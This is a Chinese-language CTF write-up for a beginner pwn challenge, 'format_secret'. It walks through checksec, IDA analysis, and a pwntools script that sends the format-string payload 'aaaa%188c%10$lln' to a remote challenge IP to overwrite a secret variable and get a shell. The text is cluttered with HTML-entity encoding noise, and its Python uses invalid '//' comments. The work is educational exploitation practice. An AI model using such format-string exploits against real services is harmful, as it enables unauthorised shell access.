CTF训练(PWN)——format_secret

CTF训练(PWN)——format_secret

这次拿到的是一道pwn题&＃xff0c;作为新手只能慢慢学习&＃xff08;啊啊啊啊&＃xff0c;pwn是真的难~~&＃xff09;

读题

根据描述&＃xff0c;知道是格式化字符串漏洞&＃xff0c;于是去度娘了解一下格式化字符串漏洞是什么&＃xff1f;&＃xff1f;&＃xff1f;

这里附上来自同站大佬的链接&＃xff1a;https://blog.csdn.net/qq_43394612/article/details/84900668

分析题目

首先下载附件

拿到一个意义不明的白色文件

解题

首先使用checksec进行查看
没有的话可以使用git进行安装

git clone https://github.com/slimm609/checksec.sh.git


执行下面这条命令&＃xff0c;在命令行中建立符号链接就可以在terminal中直接使用了

sudo ln -s checksec /usr/local/bin/checksec


可以看到该文件开启了栈溢出保护和堆栈不可执行保护。
打开ida,使用F5大法发现主函数secret

根据逻辑&＃xff0c;我们只需将secret变量值改为192即可getshell。同样的在主函数中存在格式化字符串漏洞&＃xff0c;我们可以任意控制格式化字符串。

找到secret的地址

通过分析&＃xff0c;我们将secret变量修改为192&＃xff0c;我们构造如下格式化字符串&＃xff0c;并发送&＃xff0c;便可成功getshell。

payload &＃61; &＃39;aaaa%188c%10$lln&＃39; # 8,9
payload &＃43;&＃61; p64(0x60107c) # 10


完整exp&＃xff1a;

#!/usr/bin/python
#coding:utf-8
from pwn import * //pwntools小工具&＃xff0c;百度就可以搜出来安装方式
io &＃61; remote(&＃39;47.114.137.161&＃39;,50837) //远程连接服务器io &＃61; process(&＃39;./pwn&＃39;)
context.log_level &＃61; &＃39;debug&＃39;
context.update(arch&＃61;&＃39;amd64&＃39;, os&＃61;&＃39;linux&＃39;)
payload &＃61; &＃39;aaaa%188c%10$lln&＃39; # 8,9
payload &＃43;&＃61; p64(0x60107c) # 10 //p64是打包&＃xff0c;后面是secret的地址
io.sendline(payload) //发送
io.interactive() //允许互动